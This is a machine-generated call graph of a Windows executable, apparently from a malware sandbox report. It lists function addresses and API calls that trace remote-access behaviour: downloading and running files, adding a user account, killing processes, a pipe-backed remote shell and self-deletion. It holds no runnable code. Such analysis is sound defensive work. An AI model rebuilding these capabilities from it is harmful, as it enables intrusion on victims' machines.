404e44 13474->13475 13476 404cf6 13474->13476 13479 404ee7 13475->13479 13480 404e4d 13475->13480 13477 404e39 13476->13477 13478 404cfc 13476->13478 13788 40290e 13477->13788 13481 404d05 13478->13481 13482 404daf 13478->13482 13484 404f4b 13479->13484 13485 404eec 13479->13485 13486 404ee0 13480->13486 13487 404e53 13480->13487 13491 404da3 13481->13491 13492 404d0b 13481->13492 13495 404e01 13482->13495 13496 404db4 13482->13496 14043 4027c1 13484->14043 13497 404f42 13485->13497 13498 404ef2 13485->13498 13977 402aa3 13486->13977 13488 404e58 13487->13488 13489 404ebf 13487->13489 13499 404eb0 13488->13499 13500 404e5a 13488->13500 13489->13494 13964 4027ff 13489->13964 13720 402b36 13491->13720 13502 404d10 13492->13502 13503 404d6a 13492->13503 13507 404e06 13495->13507 13508 404e2d 13495->13508 13505 404f67 13496->13505 13506 404dba 13496->13506 14037 40278b 13497->14037 13509 404ef8 13498->13509 13510 404f3b 13498->13510 13955 40d1c8 EnterCriticalSection 13499->13955 13513 404ea3 13500->13513 13514 404e5f 13500->13514 13522 404d12 13502->13522 13523 404d5e 13502->13523 13515 404d97 13503->13515 13516 404d6f 13503->13516 14054 402a9c 13505->14054 13525 404df7 13506->13525 13526 404dbf 13506->13526 13517 404e22 13507->13517 13518 404e0c 13507->13518 13764 402a0a 13508->13764 13511 404efd 13509->13511 13512 404f2e 13509->13512 14034 402774 13510->14034 13529 404f20 13511->13529 13530 404f03 13511->13530 14031 40cf1b 13512->14031 13946 40906f InitializeCriticalSection DeleteCriticalSection EnterCriticalSection GetModuleHandleA 13513->13946 13531 404e65 13514->13531 13532 404e98 13514->13532 13695 402c31 SetLastError 13515->13695 13537 404d75 13516->13537 13538 404d8b 13516->13538 13539 415a43 9 API calls 13517->13539 13518->13494 13756 40c09d 13518->13756 13542 404d17 13522->13542 13543 404d4d 13522->13543 13652 402d20 13523->13652 13743 402aee 13525->13743 13527 404dc5 13526->13527 13528 404de9 13526->13528 13545 404dcb 13527->13545 13546 404ddf 13527->13546 13734 414345 13528->13734 14012 4026bb 13529->14012 13547 404f17 13530->13547 13548 404f08 13530->13548 13549 404e86 13531->13549 13550 404e6b 13531->13550 13940 409029 EnterCriticalSection 13532->13940 13537->13494 13657 402b4b 13537->13657 13680 402bdc 13538->13680 13539->13494 13557 404d43 13542->13557 13558 404d1d 13542->13558 13612 402e27 13543->13612 13545->13494 13725 402ac6 13545->13725 13728 41430e 13546->13728 13999 40264d 13547->13999 13548->13494 13982 402cbb 13548->13982 13832 40e29a InitializeCriticalSection DeleteCriticalSection EnterCriticalSection 13549->13832 13550->13494 13819 402895 13550->13819 13599 402dc9 13557->13599 13564 404d23 13558->13564 13565 404d39 13558->13565 13564->13494 13571 402d2f 13564->13571 13586 402d82 13565->13586 13572 40373f 3 API calls 13571->13572 13573 402d44 13572->13573 14073 411446 13573->14073 13575 402d4c 14091 4013b3 13575->14091 13580 405044 15 API calls 13581 402d6a 13580->13581 14102 4044fa 13581->14102 13584 402d7f 13584->13494 14133 41154a 13586->14133 13588 402d93 14155 4013fa 13588->14155 13593 405044 15 API calls 13594 402db1 13593->13594 14166 4045e8 13594->14166 13597 402dc6 13597->13494 14202 4122ca 13599->14202 13601 402ddb 14230 40136c 13601->14230 13606 405044 15 API calls 13607 402df9 13606->13607 14241 4046f1 13607->14241 13609 402e23 13609->13494 13611 402e01 13611->13609 14245 401468 13611->14245 14278 410e5e 13612->14278 13617 4134a2 6 API calls 13618 402e6d 13617->13618 13619 4036f7 4 API calls 13618->13619 13620 402e93 13619->13620 13621 4036f7 4 API calls 13620->13621 13622 402e9c 13621->13622 14297 410f3e GlobalMemoryStatusEx 13622->14297 13624 402ea1 13625 4036f7 4 API calls 13624->13625 13626 402eb2 13625->13626 14298 41119d GetComputerNameW 13626->14298 13629 411177 3 API calls 13630 402ebf 13629->13630 13631 41111b 4 API calls 13630->13631 13632 402ec5 13631->13632 13633 410f61 2 API calls 13632->13633 13634 402ecb 13633->13634 14301 4111d7 13634->14301 13639 405044 15 API calls 13640 402eea 13639->13640 14348 4042cc 13640->14348 14374 4012ff 13652->14374 13656 402d2e 13656->13494 13658 4034d1 4 API calls 13657->13658 13659 402b64 13658->13659 14419 4034b5 lstrcmpA 13659->14419 13661 402b6c 14420 405feb VirtualFree 13661->14420 13663 402b87 13664 402b93 13663->13664 13665 402b8b 13663->13665 13667 4034d1 4 API calls 13664->13667 14421 4102d4 13665->14421 13669 402ba0 13667->13669 13668 402b91 13668->13494 14432 4034b5 lstrcmpA 13669->14432 13671 402ba8 14433 405feb VirtualFree 13671->14433 13673 402bb2 13674 402bb6 13673->13674 13675 402bc9 13673->13675 13676 40ffa8 5 API calls 13674->13676 13677 403507 3 API calls 13675->13677 13676->13668 13678 402bd2 13677->13678 14434 4101ef 13678->14434 14505 41229c OpenProcess 13680->14505 13682 402bf1 13683 402c00 GetLastError 13682->13683 13684 402bf5 13682->13684 13686 402bfc 13683->13686 13685 402dc9 38 API calls 13684->13685 13685->13686 14508 41221f CreateToolhelp32Snapshot 13686->14508 13688 402c13 14516 404413 13688->14516 13691 405044 15 API calls 13692 402c24 13691->13692 14521 4043fc 13692->14521 13696 40373f 3 API calls 13695->13696 13697 402c53 13696->13697 14526 41142a DeleteFileW 13697->14526 13699 402c58 13700 402c8c GetLastError 13699->13700 13701 402c5d 13699->13701 13719 402c8a 13700->13719 13702 40373f 3 API calls 13701->13702 13704 402c66 13702->13704 13703 40373f 3 API calls 13705 402c9d 13703->13705 13706 40373f 3 API calls 13704->13706 14538 404098 13705->14538 13708 402c72 13706->13708 14529 403b35 13708->14529 13712 405044 15 API calls 13714 402cae 13712->13714 14543 404081 13714->14543 13715 402c82 14535 403b1e 13715->14535 13719->13703 13721 4012ff 3 API calls 13720->13721 13722 402b42 13721->13722 14551 4076ba 13722->14551 13724 402b49 13724->13494 13726 405044 15 API calls 13725->13726 13727 402adb 13726->13727 13727->13494 14585 41178e WaitForSingleObject 13728->14585 13730 414318 13731 414338 ReleaseMutex 13730->13731 14586 414c38 13730->14586 13731->13494 13733 414331 13733->13731 14589 41178e WaitForSingleObject 13734->14589 13736 414352 13737 41439f ReleaseMutex 13736->13737 13742 414379 13736->13742 14590 406099 GetProcessHeap HeapAlloc 13736->14590 13737->13494 13740 41436d 13741 414e7b 20 API calls 13740->13741 13740->13742 13741->13742 14591 414cb1 CoInitialize CoCreateInstance 13742->14591 14612 4141e5 13743->14612 13750 405044 15 API calls 13751 402b1e 13750->13751 14640 404868 13751->14640 13754 402b33 13754->13494 13757 40c0b0 13756->13757 13758 40c0aa 13756->13758 14680 406045 GetProcessHeap RtlAllocateHeap 13757->14680 13760 401ad0 VirtualFree 13758->13760 13760->13757 13761 40c0c9 14681 401f6d CreateThread 13761->14681 13763 40c0ec 13763->13494 13765 40373f 3 API calls 13764->13765 13766 402a22 13765->13766 13767 411722 5 API calls 13766->13767 13768 402a2a 13767->13768 13769 40373f 3 API calls 13768->13769 13770 402a33 PathFileExistsW 13769->13770 14682 405feb VirtualFree 13770->14682 13772 402a46 13773 402a56 13772->13773 13774 402a4b 13772->13774 14685 4116b1 CreateFileW 13773->14685 14683 4116f0 CreateFileW 13774->14683 13777 402a90 13779 41140c 4 API calls 13777->13779 13778 402a54 13778->13777 13780 40315e 2 API calls 13778->13780 13781 402a98 13779->13781 13782 402a73 13780->13782 13781->13494 14688 41165c 13782->14688 13785 403148 2 API calls 13786 402a88 13785->13786 13787 411644 CloseHandle 13786->13787 13787->13777 13789 410c8a 5 API calls 13788->13789 13790 402924 13789->13790 13791 4035b9 21 API calls 13790->13791 13792 40292f 13791->13792 13793 40357c 9 API calls 13792->13793 13794 40293e 13793->13794 13795 403447 5 API calls 13794->13795 13796 402946 13795->13796 14695 405feb VirtualFree 13796->14695 13798 40294e 13799 40373f 3 API calls 13798->13799 13800 40295d 13799->13800 14696 40362f 13800->14696 13803 403447 5 API calls 13804 402972 13803->13804 14701 405feb VirtualFree 13804->14701 13806 40297a 14702 405feb VirtualFree 13806->14702 13808 402986 13809 40373f 3 API calls 13808->13809 13810 402992 URLDownloadToFileW 13809->13810 14703 405feb VirtualFree 13810->14703 13812 4029ab 13813 4029b8 ShellExecuteW 13812->13813 13814 4029af 13812->13814 13813->13814 13815 405044 15 API calls 13814->13815 13816 4029ec 13815->13816 14704 405feb VirtualFree 13816->14704 13818 4029f4 13818->13494 13820 40d1c8 5 API calls 13819->13820 13821 4028ab 13820->13821 13822 4034d1 4 API calls 13821->13822 13823 4028c9 13822->13823 14705 405db3 13823->14705 13825 4028d7 13826 403666 11 API calls 13825->13826 13827 4028de 13826->13827 14708 40d20c 13827->14708 13829 4028e4 14723 405feb VirtualFree 13829->14723 13831 4028ec 13831->13494 14728 40dcbf 13832->14728 13835 40e3f4 13837 410a3c 2 API calls 13835->13837 13836 40e2f9 13838 4036f7 4 API calls 13836->13838 13839 40e3f9 13837->13839 13840 40e306 13838->13840 13841 40e56f 13839->13841 14769 4109ed LoadLibraryA 13839->14769 13842 412c67 22 API calls 13840->13842 13843 404c5e 3 API calls 13841->13843 13845 40e312 13842->13845 13846 40e583 13843->13846 13848 403549 3 API calls 13845->13848 13851 405044 15 API calls 13846->13851 13847 40e407 13847->13841 13849 40e40f 13847->13849 13850 40e31d 13848->13850 13852 41111b 4 API calls 13849->13852 14753 405feb VirtualFree 13850->14753 13854 40e58b 13851->13854 13855 40e414 13852->13855 13857 404c3b VirtualFree 13854->13857 13858 40e444 13855->13858 13859 40e419 13855->13859 13856 40e325 14754 405feb VirtualFree 13856->14754 13861 40e593 LeaveCriticalSection 13857->13861 13865 4035b9 21 API calls 13858->13865 13862 404c5e 3 API calls 13859->13862 13864 40e59c 13861->13864 13866 40e42d 13862->13866 13863 40e332 13867 4036f7 4 API calls 13863->13867 13864->13494 13868 40e44f 13865->13868 13869 405044 15 API calls 13866->13869 13870 40e33f 13867->13870 13871 403549 3 API calls 13868->13871 13872 40e435 13869->13872 13873 412c67 22 API calls 13870->13873 13874 40e45a 13871->13874 13875 404c3b VirtualFree 13872->13875 13876 40e34b 13873->13876 14772 405feb VirtualFree 13874->14772 13879 40e3ca 13875->13879 13880 403549 3 API calls 13876->13880 13878 40e462 13881 4035b9 21 API calls 13878->13881 13882 40e4f8 LeaveCriticalSection 13879->13882 13883 40e358 13880->13883 13884 40e46d 13881->13884 13882->13864 14755 405feb VirtualFree 13883->14755 13886 403549 3 API calls 13884->13886 13888 40e47a 13886->13888 13887 40e360 14756 405feb VirtualFree 13887->14756 14773 405feb VirtualFree 13888->14773 13891 40e36b 13893 403373 lstrlenW 13891->13893 13892 40e482 RegCreateKeyExA RegSetValueExW RegCloseKey 14774 40d2b8 NetUserAdd 13892->14774 13894 40e375 13893->13894 13896 40e3cc 13894->13896 13898 403373 lstrlenW 13894->13898 13899 404c5e 3 API calls 13896->13899 13903 40e380 13898->13903 13904 40e3dc 13899->13904 13900 40e4d8 13905 404c5e 3 API calls 13900->13905 13901 40e50b 13902 4036f7 4 API calls 13901->13902 13906 40e51d 13902->13906 13903->13896 13907 40e384 13903->13907 13908 405044 15 API calls 13904->13908 13909 40e4e8 13905->13909 14780 412c34 13906->14780 13911 4036f7 4 API calls 13907->13911 13912 40e3e4 13908->13912 13913 405044 15 API calls 13909->13913 13915 40e392 13911->13915 13916 404c3b VirtualFree 13912->13916 13917 40e4f0 13913->13917 13919 4036f7 4 API calls 13915->13919 13916->13879 13920 404c3b VirtualFree 13917->13920 13922 40e39c 13919->13922 13920->13882 13921 40e530 13923 4036f7 4 API calls 13921->13923 14757 404c5e 13922->14757 13925 40e53e 13923->13925 13927 412c34 8 API calls 13925->13927 13929 40e546 13927->13929 13928 405044 15 API calls 13930 40e3af 13928->13930 14789 405feb VirtualFree 13929->14789 14762 404c3b 13930->14762 13933 40e54e 14790 401f6d CreateThread 13933->14790 13937 40e3bf 14768 405feb VirtualFree 13937->14768 13938 40e563 LeaveCriticalSection 13938->13864 13941 409064 LeaveCriticalSection 13940->13941 13942 40903f 13940->13942 13941->13494 14808 401f98 13942->14808 13947 4090e1 13946->13947 13948 4090ca 13946->13948 13950 401f98 2 API calls 13947->13950 14812 401f6d CreateThread 13948->14812 13952 4090e6 13950->13952 13951 4090d5 13953 409100 LeaveCriticalSection 13951->13953 14813 401f6d CreateThread 13952->14813 13953->13494 13956 401f98 2 API calls 13955->13956 13957 40d1e4 13956->13957 13958 401f98 2 API calls 13957->13958 13959 40d1ef 13958->13959 14814 4056d4 shutdown 13959->14814 13962 4056d4 shutdown 13963 40d202 LeaveCriticalSection 13962->13963 13963->13494 13965 405db3 3 API calls 13964->13965 13966 40281f 13965->13966 13967 403666 11 API calls 13966->13967 13968 402826 13967->13968 14816 405feb VirtualFree 13968->14816 13970 40282e inet_addr 13971 402874 13970->13971 13972 40283c getaddrinfo 13970->13972 14817 415f88 13971->14817 13972->13971 13976 402885 13976->13494 13978 405044 15 API calls 13977->13978 13979 402abc 13978->13979 14825 4153a3 13979->14825 13983 40373f 3 API calls 13982->13983 13984 402cd4 13983->13984 13985 411446 17 API calls 13984->13985 13986 402cdc 13985->13986 13987 4013b3 12 API calls 13986->13987 13988 402cea 13987->13988 13989 40373f 3 API calls 13988->13989 13990 402cf3 13989->13990 14829 415102 13990->14829 13993 405044 15 API calls 13994 402d06 13993->13994 14840 4150d2 13994->14840 13997 402d1b 13997->13494 13998 401b27 VirtualFree 13998->13997 14000 40315e 2 API calls 13999->14000 14001 40266b 14000->14001 14002 41350d 2 API calls 14001->14002 14003 402678 14002->14003 14004 402694 14003->14004 14005 40269b 14003->14005 14006 407e67 18 API calls 14004->14006 14007 407d5e 10 API calls 14005->14007 14008 402699 14006->14008 14009 4026a0 VirtualFree 14007->14009 14008->14009 14010 403148 2 API calls 14009->14010 14011 4026b6 14010->14011 14011->13494 14013 40373f 3 API calls 14012->14013 14014 4026dd 14013->14014 14015 405db3 3 API calls 14014->14015 14016 4026ec 14015->14016 14017 403666 11 API calls 14016->14017 14018 4026f3 14017->14018 14854 405feb VirtualFree 14018->14854 14020 4026fb inet_addr 14021 402743 14020->14021 14022 40270b getaddrinfo 14020->14022 14023 40373f 3 API calls 14021->14023 14022->14021 14024 40274f 14023->14024 14855 413e36 14024->14855 14028 402762 14865 405feb VirtualFree 14028->14865 14030 40276a 14030->13494 14869 406045 GetProcessHeap RtlAllocateHeap 14031->14869 14033 40cf29 CreateThread 14033->13494 14035 405044 15 API calls 14034->14035 14036 402789 14035->14036 14036->13494 14038 402797 14037->14038 14039 4027be 14037->14039 14040 40373f 3 API calls 14038->14040 14039->13494 14041 4027a3 ShellExecuteW 14040->14041 14870 405feb VirtualFree 14041->14870 14044 405db3 3 API calls 14043->14044 14045 4027dc 14044->14045 14046 403666 11 API calls 14045->14046 14047 4027e3 14046->14047 14871 410341 14047->14871 14051 4027f3 14875 405feb VirtualFree 14051->14875 14053 4027fb 14053->13494 14055 412cf5 14054->14055 14885 4124d7 RegDeleteKeyW 14055->14885 14057 412d0b 14058 412d12 TerminateThread 14057->14058 14059 412d1f 14057->14059 14058->14059 14060 412d5f 14059->14060 14061 412612 5 API calls 14059->14061 14062 412d6b GetModuleFileNameA 14060->14062 14063 412d3b 14061->14063 14071 412d9d 14062->14071 14064 4036f7 4 API calls 14063->14064 14065 412d48 14064->14065 14886 4124f2 14065->14886 14069 412d58 14070 412554 RegCloseKey 14069->14070 14070->14060 14072 412df1 CreateProcessA CloseHandle CloseHandle ExitProcess 14071->14072 14074 4018c7 2 API calls 14073->14074 14075 411469 FindFirstFileW 14074->14075 14085 411483 14075->14085 14076 411523 14077 4013b3 12 API calls 14076->14077 14078 41152e 14077->14078 14080 41153b 14078->14080 14081 401b27 VirtualFree 14078->14081 14079 4036f7 4 API calls 14079->14085 14124 405feb VirtualFree 14080->14124 14081->14080 14083 403549 3 API calls 14083->14085 14084 411543 14084->13575 14085->14076 14085->14079 14085->14083 14087 40373f 3 API calls 14085->14087 14110 405feb VirtualFree 14085->14110 14111 4017c8 14085->14111 14123 405feb VirtualFree 14085->14123 14087->14085 14090 41150d FindNextFileW 14090->14085 14092 4018c7 2 API calls 14091->14092 14095 4013ce 14092->14095 14093 4013f1 14097 40451d 14093->14097 14095->14093 14096 4017c8 6 API calls 14095->14096 14127 401914 14095->14127 14096->14095 14098 4013b3 12 API calls 14097->14098 14099 404535 14098->14099 14100 402d62 14099->14100 14101 401b27 VirtualFree 14099->14101 14100->13580 14101->14100 14103 402d72 14102->14103 14104 40450a 14102->14104 14103->13584 14106 401b27 14103->14106 14105 401b27 VirtualFree 14104->14105 14105->14103 14107 401b38 14106->14107 14108 401b4a 14106->14108 14107->14108 14132 405feb VirtualFree 14107->14132 14108->13584 14110->14085 14112 4017df 14111->14112 14120 401889 14111->14120 14125 406099 GetProcessHeap HeapAlloc 14112->14125 14114 403549 3 API calls 14115 4018a3 14114->14115 14126 405feb VirtualFree 14115->14126 14117 4018c0 14117->14085 14118 401877 14118->14120 14122 401b27 VirtualFree 14118->14122 14119 401808 14119->14118 14121 403549 3 API calls 14119->14121 14120->14114 14121->14119 14122->14120 14123->14090 14124->14084 14125->14119 14126->14117 14128 405de9 3 API calls 14127->14128 14129 40192a 14128->14129 14130 40373f 3 API calls 14129->14130 14131 40193a 14130->14131 14131->14095 14132->14107 14174 406099 GetProcessHeap HeapAlloc 14133->14174 14135 411562 14175 401a48 14135->14175 14138 41158f 14178 406099 GetProcessHeap HeapAlloc 14138->14178 14140 4115a2 GetLogicalDriveStringsW 14150 4115ac 14140->14150 14141 4036f7 4 API calls 14141->14150 14142 4013fa 12 API calls 14143 411630 14142->14143 14145 41163d 14143->14145 14146 401b52 VirtualFree 14143->14146 14144 403549 3 API calls 14144->14150 14145->13588 14146->14145 14148 4115d0 GetDriveTypeW 14149 40373f 3 API calls 14148->14149 14149->14150 14150->14141 14150->14144 14152 403373 lstrlenW 14150->14152 14154 411622 14150->14154 14179 405feb VirtualFree 14150->14179 14180 401955 14150->14180 14192 405feb VirtualFree 14150->14192 14152->14150 14154->14142 14156 401a48 2 API calls 14155->14156 14157 401415 14156->14157 14158 401438 14157->14158 14160 401955 6 API calls 14157->14160 14196 401a95 14157->14196 14161 40460b 14158->14161 14160->14157 14162 4013fa 12 API calls 14161->14162 14163 404623 14162->14163 14164 402da9 14163->14164 14165 401b52 VirtualFree 14163->14165 14164->13593 14165->14164 14167 4045f8 14166->14167 14168 402db9 14166->14168 14169 401b52 VirtualFree 14167->14169 14168->13597 14170 401b52 14168->14170 14169->14168 14171 401b63 14170->14171 14172 401b75 14170->14172 14171->14172 14201 405feb VirtualFree 14171->14201 14172->13597 14174->14135 14193 406099 GetProcessHeap HeapAlloc 14175->14193 14177 401a71 GetLogicalDriveStringsW 14177->14138 14177->14150 14178->14140 14179->14148 14181 40196c 14180->14181 14189 401a10 14180->14189 14194 406099 GetProcessHeap HeapAlloc 14181->14194 14183 403549 3 API calls 14184 401a2a 14183->14184 14195 405feb VirtualFree 14184->14195 14186 401a41 14186->14150 14187 4019fe 14187->14189 14190 401b52 VirtualFree 14187->14190 14188 401995 14188->14187 14191 403549 3 API calls 14188->14191 14189->14183 14190->14189 14191->14188 14192->14150 14193->14177 14194->14188 14195->14186 14197 405de9 3 API calls 14196->14197 14198 401aab 14197->14198 14199 40373f 3 API calls 14198->14199 14200 401abb 14199->14200 14200->14157 14201->14171 14203 4122ec 14202->14203 14250 401735 14203->14250 14205 41230d CreateToolhelp32Snapshot 14206 412321 Process32FirstW 14205->14206 14207 4124a3 14205->14207 14209 412333 CloseHandle 14206->14209 14210 412374 14206->14210 14208 40136c 12 API calls 14207->14208 14211 4124ae 14208->14211 14212 40136c 12 API calls 14209->14212 14213 403411 9 API calls 14210->14213 14214 41236f 14211->14214 14218 401468 VirtualFree 14211->14218 14215 412345 14212->14215 14216 412392 OpenProcess 14213->14216 14214->13601 14215->14214 14220 401468 VirtualFree 14215->14220 14223 4123af 14216->14223 14217 4036f7 lstrlenW lstrlenW KiUserExceptionDispatcher VirtualAlloc 14217->14223 14218->14211 14219 4123c2 GetModuleFileNameExW 14219->14223 14220->14215 14221 405feb VirtualFree 14221->14223 14222 403549 lstrlenW lstrcpyW VirtualAlloc 14222->14223 14223->14217 14223->14219 14223->14221 14223->14222 14224 40373f lstrlenW lstrcpyW VirtualAlloc 14223->14224 14225 412426 CloseHandle 14223->14225 14227 401468 VirtualFree 14223->14227 14253 401612 14223->14253 14224->14223 14225->14223 14228 412483 Process32NextW 14227->14228 14228->14210 14229 41249c CloseHandle 14228->14229 14229->14207 14231 401735 2 API calls 14230->14231 14235 401387 14231->14235 14232 4013aa 14236 40472d 14232->14236 14234 401612 6 API calls 14234->14235 14235->14232 14235->14234 14269 401787 14235->14269 14237 40136c 12 API calls 14236->14237 14240 404745 14237->14240 14238 402df1 14238->13606 14239 401468 VirtualFree 14239->14240 14240->14238 14240->14239 14242 40471e 14241->14242 14243 404701 14241->14243 14242->13611 14243->14242 14244 401468 VirtualFree 14243->14244 14244->14243 14276 405feb VirtualFree 14245->14276 14247 401473 14277 405feb VirtualFree 14247->14277 14249 40147f 14249->13611 14267 406099 GetProcessHeap HeapAlloc 14250->14267 14252 40175e 14252->14205 14252->14252 14254 401629 14253->14254 14266 4016ee 14253->14266 14268 406099 GetProcessHeap HeapAlloc 14254->14268 14256 403549 3 API calls 14257 401715 14256->14257 14258 403549 3 API calls 14257->14258 14259 401723 14258->14259 14260 401468 VirtualFree 14259->14260 14262 40172e 14260->14262 14261 401652 14263 403549 lstrlenW lstrcpyW VirtualAlloc 14261->14263 14264 4016c8 14261->14264 14262->14223 14263->14261 14265 401468 VirtualFree 14264->14265 14264->14266 14265->14264 14266->14256 14267->14252 14268->14261 14270 405de9 3 API calls 14269->14270 14271 40179c 14270->14271 14272 40373f 3 API calls 14271->14272 14273 4017b4 14272->14273 14274 40373f 3 API calls 14273->14274 14275 4017c0 14274->14275 14275->14235 14276->14247 14277->14249 14279 410e9c 14278->14279 14357 401085 GetProcessHeap RtlAllocateHeap 14279->14357 14281 410f03 14282 4034d1 4 API calls 14281->14282 14283 410f21 14282->14283 14284 4031af 10 API calls 14283->14284 14285 410f28 14284->14285 14358 405feb VirtualFree 14285->14358 14287 410f30 14359 401099 GetProcessHeap RtlFreeHeap 14287->14359 14289 402e3f 14290 410d2d CoInitializeSecurity CoInitialize 14289->14290 14291 410d55 CoCreateInstance 14290->14291 14294 410d96 14290->14294 14291->14294 14295 410d73 14291->14295 14292 4036f7 4 API calls 14293 402e47 GetModuleFileNameA 14292->14293 14293->13617 14294->14292 14295->14293 14295->14294 14296 410de9 VariantInit 14295->14296 14296->14295 14297->13624 14299 4036f7 4 API calls 14298->14299 14300 402eba 14299->14300 14300->13629 14302 411277 14301->14302 14303 4111fd 14301->14303 14306 402fce 2 API calls 14302->14306 14304 4036f7 4 API calls 14303->14304 14305 41120a RegOpenKeyExW 14304->14305 14360 405feb VirtualFree 14305->14360 14308 41128b 14306->14308 14310 403148 2 API calls 14308->14310 14309 41122d 14311 41125c 14309->14311 14313 4036f7 4 API calls 14309->14313 14312 411293 14310->14312 14362 4061c0 14311->14362 14314 412554 RegCloseKey 14312->14314 14316 411243 14313->14316 14317 402eda 14314->14317 14320 412569 12 API calls 14316->14320 14327 40430e 14317->14327 14319 402fce 2 API calls 14321 41126f 14319->14321 14322 41124c 14320->14322 14323 403148 2 API calls 14321->14323 14361 405feb VirtualFree 14322->14361 14323->14302 14325 411254 14326 412554 RegCloseKey 14325->14326 14326->14311 14328 40315e 2 API calls 14327->14328 14329 404326 14328->14329 14330 40373f 3 API calls 14329->14330 14331 40434a 14330->14331 14332 40373f 3 API calls 14331->14332 14333 404356 14332->14333 14334 40373f 3 API calls 14333->14334 14335 40436e 14334->14335 14336 40373f 3 API calls 14335->14336 14337 40437a 14336->14337 14338 403148 2 API calls 14337->14338 14339 404382 14338->14339 14366 405feb VirtualFree 14339->14366 14341 40438a 14367 405feb VirtualFree 14341->14367 14343 404396 14368 405feb VirtualFree 14343->14368 14345 4043a2 14369 405feb VirtualFree 14345->14369 14347 402ee2 14347->13639 14370 405feb VirtualFree 14348->14370 14350 4042de 14371 405feb VirtualFree 14350->14371 14352 4042eb 14372 405feb VirtualFree 14352->14372 14354 4042f6 14373 405feb VirtualFree 14354->14373 14356 404301 14357->14281 14358->14287 14359->14289 14360->14309 14361->14325 14363 4061dd 14362->14363 14364 4030cc 6 API calls 14363->14364 14365 4061eb 14364->14365 14365->14319 14366->14341 14367->14343 14368->14345 14369->14347 14370->14350 14371->14352 14372->14354 14373->14356 14375 401308 14374->14375 14378 40131b 14374->14378 14401 406099 GetProcessHeap HeapAlloc 14375->14401 14377 401310 14377->14378 14402 4078f4 14377->14402 14380 407806 14378->14380 14409 401085 GetProcessHeap RtlAllocateHeap 14380->14409 14382 40781d 14383 403549 3 API calls 14382->14383 14384 407841 14383->14384 14410 401085 GetProcessHeap RtlAllocateHeap 14384->14410 14386 40785f 14387 40373f 3 API calls 14386->14387 14388 40786b 14387->14388 14389 40373f 3 API calls 14388->14389 14390 407874 14389->14390 14391 403373 lstrlenW 14390->14391 14392 40787c 14391->14392 14411 405feb VirtualFree 14392->14411 14394 407898 14412 405feb VirtualFree 14394->14412 14396 4078a0 14413 41178e WaitForSingleObject 14396->14413 14398 4078ba CreateThread 14414 401edd 14398->14414 14401->14377 14407 406099 GetProcessHeap HeapAlloc 14402->14407 14404 40790f 14408 4117b7 CreateMutexA 14404->14408 14406 407923 14406->14378 14407->14404 14408->14406 14409->14382 14410->14386 14411->14394 14412->14396 14413->14398 14415 401ef1 14414->14415 14417 401f1d ReleaseMutex 14414->14417 14418 406099 GetProcessHeap HeapAlloc 14415->14418 14417->13656 14418->14417 14419->13661 14420->13663 14422 410c8a 5 API calls 14421->14422 14423 4102ea 14422->14423 14424 40357c 9 API calls 14423->14424 14425 4102f7 14424->14425 14426 40373f 3 API calls 14425->14426 14427 410303 14426->14427 14443 41001a 14427->14443 14429 410308 14480 405feb VirtualFree 14429->14480 14431 41031a 14431->13668 14432->13671 14433->13673 14435 410201 14434->14435 14436 4101fd 14434->14436 14489 403271 14435->14489 14496 405feb VirtualFree 14436->14496 14440 40319e lstrlenA 14442 41021f WriteFile 14440->14442 14441 410237 14441->13668 14442->14436 14444 40ffa8 5 API calls 14443->14444 14445 41002d CreatePipe 14444->14445 14446 410166 14445->14446 14447 41006e GetCurrentProcess GetCurrentProcess DuplicateHandle 14445->14447 14449 4101ab CloseHandle 14446->14449 14447->14446 14448 410096 CreatePipe 14447->14448 14448->14446 14450 4100b2 GetCurrentProcess GetCurrentProcess DuplicateHandle 14448->14450 14451 41016e 14449->14451 14450->14446 14453 4100d0 GetCurrentProcess GetCurrentProcess DuplicateHandle 14450->14453 14452 4101ab CloseHandle 14451->14452 14454 410176 14452->14454 14453->14446 14455 4100ea 14453->14455 14456 4101ab CloseHandle 14454->14456 14457 4101ab CloseHandle 14455->14457 14458 41017e 14456->14458 14459 4100f2 14457->14459 14461 4101ab CloseHandle 14458->14461 14460 4101ab CloseHandle 14459->14460 14462 4100fa 14460->14462 14463 410186 14461->14463 14464 40373f 3 API calls 14462->14464 14465 4101ab CloseHandle 14463->14465 14466 41010f 14464->14466 14467 41018e 14465->14467 14481 40fdb0 14466->14481 14469 40ffa8 5 API calls 14467->14469 14471 410198 14469->14471 14487 405feb VirtualFree 14471->14487 14472 4101ab CloseHandle 14474 410120 14472->14474 14476 4101ab CloseHandle 14474->14476 14475 4101a2 14475->14429 14477 410128 14476->14477 14478 4101ab CloseHandle 14477->14478 14479 410130 CreateEventA CreateThread 14478->14479 14479->14446 14479->14471 14480->14431 14482 401052 14481->14482 14483 40fdc5 CreateProcessW 14482->14483 14484 40fe0c 14483->14484 14488 405feb VirtualFree 14484->14488 14486 40fe1d 14486->14446 14486->14472 14487->14475 14488->14486 14490 4034d1 4 API calls 14489->14490 14491 403285 14490->14491 14497 40329c 14491->14497 14493 40328d 14504 405feb VirtualFree 14493->14504 14495 403295 14495->14440 14496->14441 14498 40319e lstrlenA 14497->14498 14499 4032ae 14498->14499 14500 40319e lstrlenA 14499->14500 14501 4032b7 14500->14501 14502 405f8c 3 API calls 14501->14502 14503 4032c3 lstrcatA 14502->14503 14503->14493 14504->14495 14506 4122c6 14505->14506 14507 4122ae TerminateProcess CloseHandle 14505->14507 14506->13682 14507->13682 14509 41224a Process32FirstW 14508->14509 14515 41227b 14508->14515 14510 41225a 14509->14510 14511 412274 CloseHandle 14510->14511 14512 412262 Process32NextW 14510->14512 14513 412285 CloseHandle 14510->14513 14511->14515 14512->14510 14514 4036f7 4 API calls 14513->14514 14514->14515 14515->13688 14517 40373f 3 API calls 14516->14517 14518 404431 14517->14518 14524 405feb VirtualFree 14518->14524 14520 402c1c 14520->13691 14525 405feb VirtualFree 14521->14525 14523 402c2c 14523->13494 14524->14520 14525->14523 14546 405feb VirtualFree 14526->14546 14528 411441 14528->13699 14530 40373f 3 API calls 14529->14530 14531 403b4d 14530->14531 14547 405feb VirtualFree 14531->14547 14533 402c7a 14534 405feb VirtualFree 14533->14534 14534->13715 14548 405feb VirtualFree 14535->14548 14537 403b2f 14537->13719 14539 40373f 3 API calls 14538->14539 14540 4040b6 14539->14540 14549 405feb VirtualFree 14540->14549 14542 402ca6 14542->13712 14550 405feb VirtualFree 14543->14550 14545 402cb6 14545->13494 14546->14528 14547->14533 14548->14537 14549->14542 14550->14545 14573 41178e WaitForSingleObject 14551->14573 14553 407720 ReleaseMutex 14553->13724 14554 405de9 3 API calls 14555 4076d5 14554->14555 14555->14554 14556 407734 14555->14556 14572 40771e 14555->14572 14557 405de9 3 API calls 14556->14557 14558 